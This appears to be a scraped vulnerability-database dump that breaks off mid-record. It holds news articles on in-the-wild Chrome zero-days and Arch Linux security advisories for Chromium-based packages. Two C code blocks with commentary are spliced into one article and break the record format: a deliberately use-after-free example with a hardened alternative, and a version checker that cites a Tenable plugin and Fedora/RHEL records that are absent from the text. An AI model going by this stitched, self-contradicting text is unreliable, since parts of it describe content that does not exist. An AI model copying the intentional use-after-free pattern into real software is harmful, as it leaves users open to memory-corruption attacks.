Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users.\n\nWhile the update contains a total of five security fixes, the most important flaw rectified by Google concerns a [use after free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193.\n\nDetails about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9.\n\nAccording to IBM, the vulnerability is rated 8.8 out of 10 on the CVSS scale, and could allow a remote attacker to execute arbitrary code on the target system. 
\"By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system,\" the report stated.\n\nAs is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users are updated with the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n[](<https://thehackernews.com/images/-4e8UqaJKLag/YEwrYTe6kaI/AAAAAAAACB0/A61b0Tzs5nIymspbYAAIoURKA3zV5lE2QCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\n\"Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) in a blog post.\n\nWith this update, Google has fixed three zero-day flaws in Chrome since the start of the year.\n\nEarlier this month, the company issued a fix for an \"object lifecycle issue in audio\" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.\n\nChrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-03-16T04:51:58", "published": "2021-03-13T03:16:00", "id": "THN:15BF409706D7240A5276C705732D745F", "href": "https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html", "type": "thn", "title": "Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T19:02:52", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "[](<https://1.bp.blogspot.com/-BDedlOwyk0U/Xbv7PVzvTLI/AAAAAAAA1k0/1Aer3FzoV0ofHVplfGk1INnY2EzQmswvACLcBGAsYHQ/s728-e100/google-chrome-hacking.png>)\n\nAttention readers, if you are using Chrome on your Windows, Mac, and Linux computers, you need to update your web browsing software immediately to the latest version Google released earlier today. \n \nWith the release of Chrome 78.0.3904.87, Google is warning billions of users to install an urgent software update immediately to patch two high severity vulnerabilities, one of which attackers are actively exploiting in the wild to hijack computers. \n \nWithout revealing technical details of the vulnerability, the Chrome security team only says that both issues are use-after-free vulnerabilities, one affecting Chrome's audio component (**CVE-2019-13720**) while the other resides in the PDFium (**CVE-2019-13721**) library. \n\n\n \nThe use-after-free vulnerability is a class of memory corruption issues that allows corruption or modification of data in the memory, enabling an unprivileged user to escalate privileges on an affected system or software. 
\n \nThus, both flaws could enable remote attackers to gain privileges on the Chrome web browser just by convincing targeted users into visiting a malicious website, allowing them to escape sandbox protections and run arbitrary malicious code on the targeted systems. \n \n\n\n## Google Chrome Zero-Day Under Active Attacks\n\n \nDiscovered and reported by Kaspersky researchers Anton Ivanov and Alexey Kulaev, the audio component issue in the Chrome application has been found exploited in the wild, though it remains unclear at the time which specific group of hackers. \n \n\n\n> \"Google is aware of reports that an exploit for CVE-2019-13720 exists in the wild,\" Google Chrome security team said in a [blog post](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>).\n\n \n\n\n> \"Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\"\n\n \nThe [use-after-free issue](<https://thehackernews.com/2019/09/google-chrome-update.html>) is one of the most common vulnerabilities discovered and patched in the Chrome web browser in the past few months. \n \nJust over a month ago, Google released an urgent security update for Chrome to patch a total of [four use-after-free vulnerabilities](<https://thehackernews.com/2019/09/google-chrome-update.html>) in different components of the web browser, the most severe of which could allow remote hackers to take control of an affected system. \n\n\n \nIn March this year, Google also released an emergency [security update for Chrome](<https://thehackernews.com/2019/03/update-google-chrome-hack.html>) after miscreants were found actively exploiting a similar use-after-free Chrome zero-day vulnerability in the wild affecting the browser's FileReader component. 
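The object-lifecycle bug class the article describes, shown as an added example in C. This is not code from the article, from Kaspersky or from Chromium; the "audio sink", the listener and the handle table are hypothetical names chosen to illustrate the pattern. The vulnerable half keeps a raw pointer to an object that another code path frees, which is the classic use-after-free; the hardened half hands out generation-checked handles instead of pointers, so a reference held across the object's destruction is rejected rather than dereferenced, even after the freed slot has been reused by a new object.

```c
/* Added illustration of an object-lifecycle (use-after-free) bug and one
 * hardening pattern. All names are hypothetical, not Chromium's. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct AudioSink {
    char name[16];
    int volume;
} AudioSink;

/* --- Vulnerable pattern: a listener keeps a raw pointer ---------------- */
typedef struct Listener {
    AudioSink *sink;   /* dangles as soon as the sink is freed elsewhere */
} Listener;

/* Sequence that makes this a use-after-free: sink allocated, listener
 * stores the raw pointer, sink freed (e.g. when the audio context is torn
 * down), callback fires and reads through the stale pointer. That read is
 * undefined behaviour; if an attacker has re-filled the freed chunk, the
 * "volume" is attacker-controlled data. Kept only for comparison; do not
 * run it against a freed sink outside a sanitizer build. */
int vulnerable_read_volume(Listener *l) {
    return l->sink->volume;
}

/* --- Hardened pattern: generation-checked handles ---------------------- */
#define MAX_SINKS 8

typedef struct SinkSlot {
    AudioSink *obj;       /* NULL when the slot is free */
    uint32_t generation;  /* bumped on every destroy */
} SinkSlot;

typedef struct SinkHandle {
    uint32_t index;
    uint32_t generation;
} SinkHandle;

static SinkSlot g_slots[MAX_SINKS];

SinkHandle sink_create(const char *name, int volume) {
    for (uint32_t i = 0; i < MAX_SINKS; i++) {
        if (g_slots[i].obj == NULL) {
            AudioSink *s = calloc(1, sizeof *s);
            if (!s) abort();
            snprintf(s->name, sizeof s->name, "%s", name);
            s->volume = volume;
            g_slots[i].obj = s;
            return (SinkHandle){ i, g_slots[i].generation };
        }
    }
    abort();  /* table full; a real implementation would fail gracefully */
}

/* Resolve a handle; NULL means the object is gone or never existed. */
AudioSink *sink_get(SinkHandle h) {
    if (h.index >= MAX_SINKS) return NULL;
    SinkSlot *slot = &g_slots[h.index];
    if (slot->obj == NULL || slot->generation != h.generation) return NULL;
    return slot->obj;
}

void sink_destroy(SinkHandle h) {
    AudioSink *s = sink_get(h);
    if (!s) return;                  /* double destroy is harmless */
    free(s);
    g_slots[h.index].obj = NULL;
    g_slots[h.index].generation++;   /* invalidates every outstanding handle */
}

/* Safe read: -1 signals a stale handle instead of touching freed memory. */
int hardened_read_volume(SinkHandle h) {
    AudioSink *s = sink_get(h);
    return s ? s->volume : -1;
}

/* Shows that a handle held across destruction is rejected even after the
 * slot has been reused by a fresh object. Returns 1 on success. */
int demo_stale_handle_rejected(void) {
    SinkHandle h = sink_create("speakers", 70);
    int before = hardened_read_volume(h);        /* 70 */
    sink_destroy(h);
    SinkHandle h2 = sink_create("headset", 40);  /* reuses slot 0 */
    int after = hardened_read_volume(h);         /* -1: stale generation */
    int fresh = hardened_read_volume(h2);        /* 40 */
    sink_destroy(h2);
    return (before == 70 && after == -1 && fresh == 40) ? 1 : 0;
}

int main(void) {
    printf("stale handle rejected: %s\n",
           demo_stale_handle_rejected() ? "yes" : "no");
    return 0;
}
```

The generation counter is what does the work: a freed slot that is immediately reused by a new allocation still fails the handle check, which is exactly the case a raw pointer cannot distinguish. Reference counting or weak pointers achieve the same end in C++; the point is that ownership and lifetime are enforced by the type, not by every caller remembering the teardown order.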
\n \n\n\n## Technical Details of Chrome 0-day Exploit\n\n \nA day after Google released an emergency patch update for Chrome browser to fix two high-severity vulnerabilities, cybersecurity firm Kaspersky Labs revealed more technical details about the one that it reported to Google and was spotted being exploited in the wild. \n \nAccording to the researchers, attackers compromised a Korean-language news portal. They planted the exploit code on the site, like a watering-hole, to hack computers of its visitors opening the news portal using vulnerable versions of Google Chrome. \n\n\n[](<https://1.bp.blogspot.com/-0b8M8M8fp_w/Xbxsu-MXsoI/AAAAAAAA1lM/Oe9kuPoxP6ozEr3xPwug8zkpFN0ngBIWACLcBGAsYHQ/s728-e100/hacking.png>)\n\nThe exploit reportedly installs the first stage malware on the targeted systems after exploiting Chrome vulnerability (CVE-2019-13720), which then connects to a hard-coded remote command-and-control server to download the final payload. \n \nDubbed \"**Operation WizardOpium**\" by the researchers, the cyberattack has not yet been attributed to any specific group of hackers. Still, researchers found some similarities in the exploit code with the infamous [Lazarus hacking group](<https://thehackernews.com/2019/09/north-korea-cyber-attack.html>). \n \n\"So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with [Lazarus attacks](<https://thehackernews.com/2019/05/north-korean-hacking-tool.html>), although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks,\" Kaspersky said. \n\n\n \nFor more details on the Operation WizardOpium exploiting the recently-patched Chrome vulnerability, you can head on to the [new report](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) just published by Kaspersky. 
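The check an operator actually wants after reading an advisory like this is "is the installed build older than the fixed one?", and it has to be a numeric per-field comparison: compared as strings, "89.0.4389.9" sorts after "89.0.4389.128". The following C is an added example, not the Tenable plugin quoted on this page and not Google's code. The fixed-version table is an assumption drawn from the versions this page cites (78.0.3904.87 for CVE-2019-13720, 89.0.4389.72 for CVE-2021-21166); the rpm NEVR strings are constructed samples in the shape the Fedora and RHEL records above use.

```c
/* Added example: numeric comparison of dotted Chrome/Chromium versions
 * against fixed builds named in advisories. Not Tenable's or Google's code;
 * the fixed-version table is an assumption taken from this page. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_PARTS 4

/* Parse up to four dot-separated numeric fields ("89.0.4389.72").
 * Returns the number of fields parsed, 0 on malformed input. Missing
 * trailing fields are treated as 0, so "89.0" compares as 89.0.0.0. */
int parse_version(const char *s, long out[MAX_PARTS]) {
    int n = 0;
    for (int i = 0; i < MAX_PARTS; i++) out[i] = 0;
    while (*s && n < MAX_PARTS) {
        if (!isdigit((unsigned char)*s)) return 0;
        char *end;
        out[n++] = strtol(s, &end, 10);
        s = end;
        if (*s == '.') { s++; if (!*s) return 0; }   /* reject "89." */
        else if (*s) return 0;                       /* reject "-1.fc34" */
    }
    if (*s) return 0;                                /* reject a 5th field */
    return n;
}

/* <0, 0, >0 like strcmp but numeric per field; -2 if either side is
 * malformed, so callers must test for -2 before treating <0 as "older". */
int compare_versions(const char *a, const char *b) {
    long va[MAX_PARTS], vb[MAX_PARTS];
    if (!parse_version(a, va) || !parse_version(b, vb)) return -2;
    for (int i = 0; i < MAX_PARTS; i++)
        if (va[i] != vb[i]) return va[i] < vb[i] ? -1 : 1;
    return 0;
}

/* Extract the upstream version from an rpm NEVR such as
 * "chromium-89.0.4389.90-3.fc34": the text after the first '-' that is
 * followed by a digit, up to the next '-'. Returns 1 on success. */
int version_from_rpm_nevr(const char *nevr, char *out, size_t outlen) {
    const char *p = nevr;
    while ((p = strchr(p, '-')) != NULL) {
        if (isdigit((unsigned char)p[1])) { p++; break; }
        p++;
    }
    if (!p) return 0;
    const char *end = strchr(p, '-');
    size_t len = end ? (size_t)(end - p) : strlen(p);
    if (len == 0 || len >= outlen) return 0;
    memcpy(out, p, len);
    out[len] = '\0';
    return 1;
}

/* Fixed upstream builds for the two in-the-wild audio bugs on this page
 * (assumed from the quoted advisories). */
typedef struct { const char *cve; const char *fixed; } FixedIn;
static const FixedIn kFixed[] = {
    { "CVE-2019-13720", "78.0.3904.87" },
    { "CVE-2021-21166", "89.0.4389.72" },
};

/* 1 if `installed` still lacks the fix for `cve`, 0 if patched,
 * -1 if the CVE is not in the table or the version is malformed. */
int is_vulnerable(const char *installed, const char *cve) {
    for (size_t i = 0; i < sizeof kFixed / sizeof kFixed[0]; i++) {
        if (strcmp(kFixed[i].cve, cve) == 0) {
            int c = compare_versions(installed, kFixed[i].fixed);
            if (c == -2) return -1;
            return c < 0 ? 1 : 0;
        }
    }
    return -1;
}

int main(void) {
    char v[32];
    const char *pkg = "chromium-89.0.4389.90-3.fc34";   /* constructed sample */
    if (version_from_rpm_nevr(pkg, v, sizeof v))
        printf("%s -> %s, CVE-2021-21166 vulnerable=%d\n", pkg, v,
               is_vulnerable(v, "CVE-2021-21166"));
    return 0;
}
```

Two caveats for real use. First, this compares the upstream version only; a distribution may backport a fix without changing it, which is why the Nessus plugin above compares the full package NEVR against the advisory's own package version rather than the upstream number. Second, the browser binary on disk is not the one running: Chrome stages an update and keeps the old process alive until relaunch, so "About Google Chrome" showing the fixed version is only meaningful after the restart it prompts for.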
\n \n\n\n## Patch Available: Update Google Chrome Immediately\n\n \nTo patch both security vulnerabilities, Google has already started rolling out Chrome version 78.0.3904.87 for Windows, Mac, and Linux operating systems. \n \nAlthough the Chrome web browser automatically notifies users about the latest available version, users are recommended to manually trigger the update process by going to \"Help \u2192 About Google Chrome\" from the menu. \n \nBesides this, Chrome users are also recommended to run all software on their systems, whenever possible, as a non-privileged user in an attempt to diminish the effects of successful attacks exploiting any zero-day vulnerability. \n \nWe will update you with more information about these security vulnerabilities as soon as Google releases their technical details.\n", "modified": "2019-11-01T17:41:08", "published": "2019-11-01T09:32:00", "id": "THN:9C73175440CD28F1BCB5707C48282690", "href": "https://thehackernews.com/2019/11/chrome-zero-day-update.html", "type": "thn", "title": "New Chrome 0-day Bug Under Active Attacks \u2013 Update Your Browser Now!", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-14T10:27:41", "bulletinFamily": "info", "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220"], "description": "[](<https://thehackernews.com/images/-9Ndx9Vcrx9E/YHaB5SvoxwI/AAAAAAAACRI/WgbWr7Dgj6sRKNuvNcO4lj-zwEO5CNQdwCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\nGoogle on Tuesday released a new version of Chrome web-browsing software for Windows, Mac, and Linux with patches for two newly discovered security vulnerabilities for both of which it says exploits exist in the wild, allowing attackers to engage in active exploitation.\n\nOne of the two flaws concerns an insufficient validation of untrusted input in its V8 JavaScript rendering engine (CVE-2021-21220), which was demonstrated by Dataflow Security's Bruno Keith and Niklas Baumstark at the [Pwn2Own 
2021](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) hacking contest last week.\n\n[](<https://go.thn.li/inside12> \"password auditor\" )\n\nWhile Google moved to fix the flaw quickly, security researcher Rajvardhan Agarwal published a [working exploit](<https://thehackernews.com/2021/04/rce-exploit-released-for-unpatched.html>) over the weekend by reverse-engineering the patch that the Chromium team pushed to the open-source component, a factor that may have played a crucial role in the release.\n\n**UPDATE:** _Agarwal, in an email to The Hacker News, confirmed that there's [one more vulnerability](<https://twitter.com/r4j0x00/status/1382125720344793090>) affecting Chromium-based browsers that has been patched in the latest version of V8, but has not been included in the Chrome release rolling out today, thereby leaving users potentially vulnerable to attacks even after installing the new update._\n\n\"Even though both the flaws are different in nature, they can be exploited to gain RCE in the renderer process,\" Agarwal told The Hacker News via email. \"I suspect that the first patch was released with the Chrome update because of the published exploit but as the second patch was not applied to Chrome, it can still be exploited.\"\n\nAlso resolved by the company is a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink browser engine (CVE-2021-21206). 
An anonymous researcher has been credited with reporting the flaw on April 7.\n\n[](<https://thehackernews.com/images/-Co9nqKO9t2I/YHaAjushveI/AAAAAAAACRA/uFUYN6VpoCwJz2lCJEMBEGAwXowVZlR3wCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\n\"Google is aware of reports that exploits for CVE-2021-21206 and CVE-2021-21220 exist in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>) in a blog post.\n\n[](<https://go.thn.li/inside23> \"password auditor\" )\n\nIt's worth noting that the existence of an exploit is not evidence of active exploitation by threat actors. Since the start of the year, Google has fixed three shortcomings in Chrome that have been under attack, including [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>), [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>), and [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>).\n\nChrome 89.0.4389.128 is expected to roll out in the coming days. Users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-14T08:32:40", "published": "2021-04-14T05:48:00", "id": "THN:F197A729A4F49F957F9D5910875EBAAA", "href": "https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html", "type": "thn", "title": "Update Your Chrome Browser to Patch 2 New In-the-Wild 0-Day Exploits", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-03-26T20:30:35", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193"], "description": "Arch Linux Security Advisory ASA-202103-19\n==========================================\n\nSeverity: High\nDate : 2021-03-25\nCVE-ID : CVE-2020-27844 CVE-2021-21159 CVE-2021-21160 CVE-2021-21161\nCVE-2021-21162 CVE-2021-21163 CVE-2021-21165 CVE-2021-21166\nCVE-2021-21167 CVE-2021-21168 CVE-2021-21169 CVE-2021-21170\nCVE-2021-21171 CVE-2021-21172 CVE-2021-21173 CVE-2021-21174\nCVE-2021-21175 CVE-2021-21176 CVE-2021-21177 CVE-2021-21178\nCVE-2021-21179 CVE-2021-21180 CVE-2021-21181 CVE-2021-21182\nCVE-2021-21183 CVE-2021-21184 CVE-2021-21185 CVE-2021-21186\nCVE-2021-21187 CVE-2021-21188 CVE-2021-21189 CVE-2021-21190\nCVE-2021-21191 CVE-2021-21192 
CVE-2021-21193\nPackage : vivaldi\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1633\n\nSummary\n=======\n\nThe package vivaldi before version 3.7.2218.45-1 is vulnerable to\nmultiple issues including arbitrary code execution, insufficient\nvalidation, access restriction bypass, content spoofing, incorrect\ncalculation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 3.7.2218.45-1.\n\n# pacman -Syu \"vivaldi>=3.7.2218.45-1\"\n\nThe problems have been fixed upstream in version 3.7.2218.45.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-27844 (arbitrary code execution)\n\nA heap-based buffer overflow was discovered in lib/openjp2/t2.c:973 in\nthe current master (commit 18b1138fbe3bb0ae4aa2bf1369f9430a8ec6fa00) of\nOpenJPEG.\n\n- CVE-2021-21159 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21160 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the WebAudio\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21161 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21162 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21163 (insufficient validation)\n\nAn insufficient data validation security issue was found in the Reader\nMode component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21165 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21166 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component 
of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21167 (arbitrary code execution)\n\nA use after free security issue was found in the bookmarks component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21168 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nappcache component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21169 (information disclosure)\n\nAn out of bounds memory access security issue was found in the V8\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21170 (content spoofing)\n\nAn incorrect security UI security issue was found in the Loader\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21171 (content spoofing)\n\nAn incorrect security UI security issue was found in the TabStrip and\nNavigation components of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21172 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the File\nSystem API component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21173 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nNetwork Internals component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21174 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nReferrer component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21175 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the Site\nisolation component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21176 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the full\nscreen mode component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21177 (access restriction bypass)\n\nAn insufficient policy 
enforcement security issue was found in the\nAutofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21178 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nCompositing component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21179 (arbitrary code execution)\n\nA use after free security issue was found in the Network Internals\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21180 (arbitrary code execution)\n\nA use after free security issue was found in the tab search component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21181 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nautofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21182 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nnavigations component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21183 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21184 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21185 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nextensions component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21186 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the QR\nscanning component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21187 (insufficient validation)\n\nAn insufficient data validation security issue was found in the URL\nformatting component of the Chromium browser before 
version\n89.0.4389.72.\n\n- CVE-2021-21188 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.72.\n\n- CVE-2021-21189 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\npayments component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21190 (arbitrary code execution)\n\nAn uninitialized use security issue was found in the PDFium component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21191 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21192 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the tab groups\ncomponent of the Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21193 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.90. 
Google is aware of\nreports that an exploit for this issue exists in the wild.\n\nImpact\n======\n\nA remote attacker might be able to bypass security measures, trick the\nuser into performing unwanted actions or execute arbitrary code.\n\nReferences\n==========\n\nhttps://vivaldi.com/blog/desktop/minor-update-2-for-vivaldi-desktop-3-6/\nhttps://vivaldi.com/blog/vivaldi-fires-up-performance-2/\nhttps://github.com/uclouvain/openjpeg/issues/1299\nhttps://github.com/uclouvain/openjpeg/pull/1301\nhttps://github.com/uclouvain/openjpeg/commit/73fdf28342e4594019af26eb6a347a34eceb6296\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\nhttps://crbug.com/1171049\nhttps://crbug.com/1170531\nhttps://crbug.com/1173702\nhttps://crbug.com/1172054\nhttps://crbug.com/1111239\nhttps://crbug.com/1174582\nhttps://crbug.com/1177465\nhttps://crbug.com/1161144\nhttps://crbug.com/1152226\nhttps://crbug.com/1166138\nhttps://crbug.com/1111646\nhttps://crbug.com/1152894\nhttps://crbug.com/1150810\nhttps://crbug.com/1154250\nhttps://crbug.com/1158010\nhttps://crbug.com/1146651\nhttps://crbug.com/1170584\nhttps://crbug.com/1173879\nhttps://crbug.com/1174186\nhttps://crbug.com/1174943\nhttps://crbug.com/1175507\nhttps://crbug.com/1182767\nhttps://crbug.com/1049265\nhttps://crbug.com/1105875\nhttps://crbug.com/1131929\nhttps://crbug.com/1100748\nhttps://crbug.com/1153445\nhttps://crbug.com/1155516\nhttps://crbug.com/1161739\nhttps://crbug.com/1165392\nhttps://crbug.com/1166091\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html\nhttps://crbug.com/1167357\nhttps://crbug.com/1181387\nhttps://crbug.com/1186287\nhttps://security.archlinux.org/CVE-2020-27844\nhttps://security.archlinux.org/CVE-2021-21159\nhttps://security.archlinux.org/CVE-2021-21160\nhttps://security.archlinux.org/CVE-2021-21161\nhttps://security.archlinux.org/CVE-2021-21162\nhttps://security.archlinux.org/CVE-2021-21163\nhttps://security.archlinux.org/CVE-2021-
21165\nhttps://security.archlinux.org/CVE-2021-21166\nhttps://security.archlinux.org/CVE-2021-21167\nhttps://security.archlinux.org/CVE-2021-21168\nhttps://security.archlinux.org/CVE-2021-21169\nhttps://security.archlinux.org/CVE-2021-21170\nhttps://security.archlinux.org/CVE-2021-21171\nhttps://security.archlinux.org/CVE-2021-21172\nhttps://security.archlinux.org/CVE-2021-21173\nhttps://security.archlinux.org/CVE-2021-21174\nhttps://security.archlinux.org/CVE-2021-21175\nhttps://security.archlinux.org/CVE-2021-21176\nhttps://security.archlinux.org/CVE-2021-21177\nhttps://security.archlinux.org/CVE-2021-21178\nhttps://security.archlinux.org/CVE-2021-21179\nhttps://security.archlinux.org/CVE-2021-21180\nhttps://security.archlinux.org/CVE-2021-21181\nhttps://security.archlinux.org/CVE-2021-21182\nhttps://security.archlinux.org/CVE-2021-21183\nhttps://security.archlinux.org/CVE-2021-21184\nhttps://security.archlinux.org/CVE-2021-21185\nhttps://security.archlinux.org/CVE-2021-21186\nhttps://security.archlinux.org/CVE-2021-21187\nhttps://security.archlinux.org/CVE-2021-21188\nhttps://security.archlinux.org/CVE-2021-21189\nhttps://security.archlinux.org/CVE-2021-21190\nhttps://security.archlinux.org/CVE-2021-21191\nhttps://security.archlinux.org/CVE-2021-21192\nhttps://security.archlinux.org/CVE-2021-21193", "modified": "2021-03-25T00:00:00", "published": "2021-03-25T00:00:00", "id": "ASA-202103-19", "href": "https://security.archlinux.org/ASA-202103-19", "type": "archlinux", "title": "[ASA-202103-19] vivaldi: multiple issues", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-09-22T18:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720"], "description": "Arch Linux Security Advisory ASA-201911-7\n=========================================\n\nSeverity: Critical\nDate : 2019-11-04\nCVE-ID : CVE-2019-13720\nPackage : electron\nType : arbitrary code execution\nRemote : Yes\nLink : 
